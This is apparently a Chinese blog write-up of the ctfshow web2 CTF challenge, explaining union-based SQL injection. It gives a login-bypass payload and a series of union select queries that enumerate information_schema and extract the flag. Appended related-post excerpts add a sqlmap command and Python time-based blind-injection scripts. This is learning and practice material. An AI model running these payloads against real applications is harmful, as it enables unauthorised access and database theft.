ctfshow_web2-----sql注入多表联合查询

最新推荐文章于 2025-08-18 20:27:34 发布
原创 最新推荐文章于 2025-08-18 20:27:34 发布 · 2k 阅读 · 23 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #数据库 #flag #ctf #web

先学一下sql基本语句

这里要用到select,union,information_schema,limit

这一题是单引号闭合,字符型注入

万能账号

1' or 1=1#

sql语句为:

SELECT * FROM admin WHERE Username='$username' AND Password='$password'

提交密码账号后

SELECT * FROM admin WHERE Username='1' or 1=1#' AND Password='$password'

#' LIMIT 0,1之后都被注释掉了

所以密码任意都能通过

先解释一下union:跳过原查询条件

查看回显位置

1' or 1=1 union select 1,2,3#

爆库名

1' or 1=1 union select 1,database(),3#

爆表名

1' or 1=1 union select 1,(select table_name from information_schema.tables where table_schema='web2'),3#

咦,这个怎么没有回显

搜索一下发现

UNION查询中,select 1,(子查询),3里的子查询属于 “标量子查询”(作为SELECT列表中的一个字段),必须只能返回 1 行 1 列

查看wp

先查看数据库表的数量

1' or 1=1 union select 1,(select count(*) from information_schema.tables where table_schema='web2'),3#

接着查第一个表名

' or 1=1 union select 1,(select table_name from information_schema.tables where table_schema='web2' limit 0,1),3 limit 1,2;#

得到表名flag

查第二个表名

' or 1=1 union select 1,(select table_name from information_schema.tables where table_schema='web2' limit 1,1),3 limit 1,2;#

得到表名user

查flag列的数量

' or 1=1 union select 1,(select count(*) from information_schema.columns where table_name='flag' limit 0,1),3 limit 1,2;#

查flag表列名

' or 1=1 union select 1,(select column_name from information_schema.columns where table_name='flag' limit 0,1),3 limit 1,2;#

查flag

' or 1=1 union select 1,(select flag from flag),3;#

ctfshow{c9dd5867-5931-49b2-b7f9-6f0b2af7bbde}

ctfshow_web14------(PHP+switch case 穿透+SQL注入+文件读取)
hello_mszcc的博客
09-11 348
过滤的关键词有information_schema.tables,information_schema.columns,linestring,空格,polygon。Wappalyzer 识别到 Nginx,网站默认根目录:/var/www/html/。解释:$c = intval($_GET['c']);进入here_1s_your_f1ag.php是一个查询页面,sql注入。要权限,用user()看一下权限是root可以用load_file()读。mysql提供了读取本地文件的函数load_file()
ctfshow sql注入 web234--web241
2301_81040377的博客
07-03 525
如果说为什么要在insert.php进行注入的话,我不知道你注意前面的注入没有都是在相应的php页面进行的。回来刷新就有flag了,我调了一会笑死了,之前的脚本居然没起到注入的作用然后又在那里慢慢调。这个脚本我写了很久,因为我之前并没有完全理解try,except,现在懂了。api是一个url的接口,所以我们在这里实现注入。这里我们直接闭合username然后就行。过滤之后,我们还有另外两个能够使用的库。看到页面没有注入的地方我们访问api。脚本还是比较简单的我就不解释了。被过滤了,所以我们用。
CTF系列之Web——联合查询注入
洛柒尘的博客
06-27 4351
前言 在刚学习SQL注入的过程中非常艰难,查资料的时间有一周这么长,点开的网页也不下一千,认真读的也最少有两百,可是能引导入门的真的没几篇,都是复制来复制去的,没意思,感觉就是在浪费时间。有很知识点都很散,很少能考到一片吧所有知识点总结在一块,最少也要三四个知识点也好呀,可惜太少了,大部分大佬写的都是基于他们现有的技术写的,写的很笼统,不适合新手看。可以发现很大佬的文章看不懂就是这个原因,没有基础看的很懵的。所以我就想着写两三篇来总结我学习过的SQL注入知识点。 学习web系列推荐先学习MySQL、H
[CTF] union select 联合查询,linux命令执行
V1040375575的博客
12-26 1002
文章目录前言一、题目二、解题步骤1.使用bp抓包分析2.成功登陆后台 前言 CTF 学习记录:union select 联合查询,linux命令执行漏洞 一、题目 提  示: hint:union,命令执行 描  述: 命令执行 打开题目页面是一个login登陆 二、解题步骤 1.使用bp抓包分析 抓取登陆发送包: POST /login.php HTTP/1.1 Host: 1.1.1.1:10766 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64;
一天一道ctf 第18天(联合查询构建虚拟数据)
scrawman的博客
03-31 356
[GXYCTF2019]BabySQli 试了一下发现过滤了and,or,order,(),但可以大写绕过 试了一下Order by 3#可以,但是union select 1,2,3#也没有回显,到这里就卡住了 原来search.php的源码里有提示 base32编码由大小写字母和数字组成,base64只由大写字母和数字组成,所以这是base32。解密后得到一串base64加密过的字符串,再解密后得到 select * from user where username = '$name' 这里用的知识
CTF-SQL
qq_61774705的博客
08-12 949
CTF-SQL
CTF--SQL注入
woshisz0413的博客
11-27 517
SQL注入思路: 1.是否存在SQL注入测试方法:(1)使用单引号’ (2)sqlmap:sqlmap.py -u http://******* 2.判断过滤的字符 SQL注入方式: (1)单引号’ (2)or/and 1=1 (3)order by --猜测字段长度 (&&与||绕过过滤) 例:order by 1… SQL绕过过滤方式: (1)某一关键字被过滤:1...
ctf从入门到放弃学习笔记SQL注入基于union的信息获取 190509
爱党人士
05-09 841
union 联合查询: 可以通过联合查询来查询指定的数据 用法举例: select username,password from user where id=1 unionselect 字段1,字段2 from 联合查询的字段数需要和主查询一致!‘ 如何确定字段数??-》order by了解一下吧 然后, 用union查询又有什么用呢? 用union的目的是为了获得更的信息...
CTFSHOW-web入门-sql注入web201——web213)(系统练习sqlmap)
最新发布
JL20050725的博客
08-18 972
这次过滤了*空格与=,那么便不能用/**/来替换空格了,可以用+替换空格,用like替换等于。对应的绕waf函数是,space2plus.py,equaltolike.py。但是经过我的测试发现无法成功,并且内置绕过空格的现在都不好用了。我们可以自己写一个自定义的绕waf脚本。可以采用: Tab %09、换行符 %0A、回车符 : %0D 代替空格。这里我参考了my6n师傅的做法。为了不影响原本的 tamper,在tamper目录下新建一个Mytamper目录(用于存放自定义的脚本)。
CTFshowweb171~180---SQL注入(1)
金 帛的博客
06-04 3838
ctfshowSQL注入的wp
ctfshow web入门 sqli-labs web517--web524
2301_81040377的博客
06-28 657
然后发现这几个里面没有flag,我们重新倒回去爆库名,肯定是库错了,因为我偷工减料了。盲猜是一个md5闭合我没有跑fuzz,正常做法应该是跑个fuzz。不会的去我主页学,hhh。单引号被过滤了好像是。所以我是自己慢慢试的。闭合换了并且不是盲注。
CTFctfshow——web
m0_52923241的博客
09-19 4253
ctfshowweb通关web签到题(so easy)web2SQL注入漏洞(联合查询web3:文件包含漏洞web4:文件包含漏洞(日志注入web5:md5绕过web6:SQL注入漏洞(空格被过滤)web7:SQL注入漏洞(盲注&sqlmap)布尔盲注sqlmapweb8:SQL注入漏洞(布尔盲注)web9:robots.txt + SQL注入 + md5web10web11:web12 web签到题(so easy) base64解码点这里 F12,看到有一串字符串,base64解码
ctfshow(171,172,173)--SQL注入--联合注入
m0_56019217的博客
10-27 964
由于会检查返回的数据中有没有字符串flag,所以我们最后只返回password字段即可,因为username字段中含有flag,会导致被匹配到,从而获取数据失败。将前面的数字变为-1,因为数据中没有id=-1的行,这样就不会查询出数据,防止查询的数据覆盖我们需要的回显。由于username不可能在不等于flag的同时又等于flag,所以不能查询到flag。对象row指的是查询出的行,如果该对象的username不为flag,才能查询成功。的含义是当查询到相应的数据时,只返回一条数据。
ctfshow-sql注入练习记录
sucker的博客
03-03 999
payload:' or 1=1 order by 4 # 发生报错,说明数据没有4列。a'or/**/1=1/**/order/**/by/**/3# 不报错,说明至少有三列。说明数据至少有3列。2,构造语句提交上去判断注入类型,payload:admin' or 1 = 1 #a'or/**/1=1/**/order/**/by/**/4# 报错,说不大于四列。说明需要进行绕过,而id=1/**/#不报错,说明是get型数字型注入2,然后再查询数据有几列,使用/**/绕过对空格使用的限制。
CTFWeb各种题目的解题姿势
05-25
Web题型是CTF中常考题型之一,它将实际渗透过程中的技术技巧转化为CTF赛题,主要考察选手在Web渗透技术方面的能力,由于Web渗透涉及的知识点较,知识面比较广泛,因此系统的总结和练习Web类题,是快速掌握出题人思路的一种有效的方法。
SQL注入——联合查询和报错注入
18年3月萌新白帽子
06-11 6389
1.别人可能用一个括号将要查询的内容阔在一起了  可以使用)将其闭合2.还有人可能过滤掉了关键字可以使用如下方法anandd   selecselectt如果URL中把=号过滤掉了可以使用like进行模糊查询报错注入sql里 0x3a示一个冒号具体用法and (select 1 from (select count(*),concat((select count(schema_name) fr...
【安全攻防知识-7】CTFweb(1)
qq_26579613的博客
06-01 4660
ctf-web题型总结
简单联合union查询注入
vcdy
06-02 9340
联合查询有前提  必须有显示位 用sql-labs来学习这是第一个http://127.0.0.1/sqli-labs/Less-1/?id=1一、判断是否用'做字符串引号http://127.0.0.1/sqli-labs/Less-1/?id=1'and 1=1 --+正常输出出错代没有闭合  说明没有用'  可能没有用' 或用了"或()二、判断它所在的数据库有几列http://127.0....
ctfshow-萌新-web3( 利用intval函数的特性配合联合注入获取网站敏感信息)
热门推荐
wangyuxiang946的博客
09-09 1万+
ctf.show 萌新模块 web3关,此关卡考察的是 intval()函数的特性,以及SQL注入漏洞的利用;首先需要利用 intval()转换字符串的特性绕过校验,而后利用联合注入获取数据库中的敏感信息,从而获取flag,源码中过滤了or,加减乘除(+-*/),hex,!等关键字,这里推荐使用联合注入 页面中给出了源码,并提示我们 id=1000 时,就可以拿到flag 源码中由两个关键点,首先是intval()函数的转换,这里可以利用 intval()函数转换字符串时的特性...
ctfshow-sql注入
06-19
### CTFShow SQL注入技术学习与解析 CTFShow平台上的SQL注入题目是学习和实践SQL注入技术的良好资源。以下将从基础到高级,结合引用内容[^1],介绍如何在CTFShow平台上进行SQL注入的练习与解析。 #### 一、SQL注入基础知识 SQL注入是一种攻击技术,通过向应用程序输入恶意SQL代码,绕过安全验证或提取数据库信息。SQL注入的核心在于构造特殊字符或语句,使程序执行非预期的SQL命令[^2]。 #### 二、CTFShow SQL注入题目解析 以下是对CTFShow平台上常见SQL注入题目的解析: 1. **查操作** 使用`sqlmap`工具自动化查是一个常见的入门方法。例如,使用以下命令可以列出目标数据库中的所有: ```bash sqlmap -u "http://f6405b3c-b606-47bd-b2b1-443c31e912c6.challenge.ctf.show/api/?id=12" --user-agent sqlmap --referer http://f6405b3c-b606-47bd-b2b1-443c31e912c6.challenge.ctf.show/sqlmap.php -D ctfshow_web --tables ``` 这段命令利用了`sqlmap`工具,通过指定URL参数`id`,并设置数据库名称为`ctfshow_web`来枚举所有名。 2. **查询列名** 查询列名时,可以通过`UNION SELECT`语句构造payload。例如,以下payload用于查询`users`的列名: ```sql url?id = 1 union select 1,2,column_name from infomation_schema.columns where table_table = 'users' ``` 该语句通过`information_schema.columns`获取目标的列名[^3]。 3. **布尔盲注与时间盲注** 布尔盲注和时间盲注是两种常见的盲注方法。以下是一个布尔盲注的Python脚本示例: ```python import requests import string url = 'http://b6c2fdd0-e452-4aee-84ce-73716e1a42cd.challenge.ctf.show/api/index.php' dic = string.digits + string.ascii_lowercase + '{}-_' out = '' for j in range(1, 50): for k in dic: payload = f"u=if(substr((select flagaabc from ctfshow_flaga),{j},1)='{k}',sleep(0.1),0)" re = requests.get(url, params=payload) if re.elapsed.total_seconds() > 2: out += k break print(out) ``` 上述脚本通过构造`substr`函数逐步提取目标字段的内容,并结合`sleep`函数实现时间盲注[^4]。 4. **DELETE语句的时间盲注** 当题目限制无法直接插入数据时,可以考虑使用时间盲注。以下是一个基于`DELETE`语句的时间盲注脚本: ```python import requests import time import urllib.parse url = "http://b37e7121-22c6-4917-bfa5-ddc38a0ed78f.challenge.ctf.show/api/delete.php" s = '0123456789abcdef-' flag = 'ctfshow{' for i in range(9, 46): for j in s: data = {'id': f'0||if(substr((select flag from flag),{i},1)="{j}",sleep(1),0)'} try: requests.post(url, data=data, timeout=1) except: flag += j print(flag) break time.sleep(1) ``` 该脚本通过构造`if`条件语句,结合`sleep`函数延迟响应时间,从而判断每个字符是否正确[^5]。 #### 三、总结 CTFShow平台上的SQL注入题目涵盖了从基础到高级的各种技巧,包括查、查询列名、布尔盲注和时间盲注等。通过实践这些题目,可以系统地掌握SQL注入技术。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值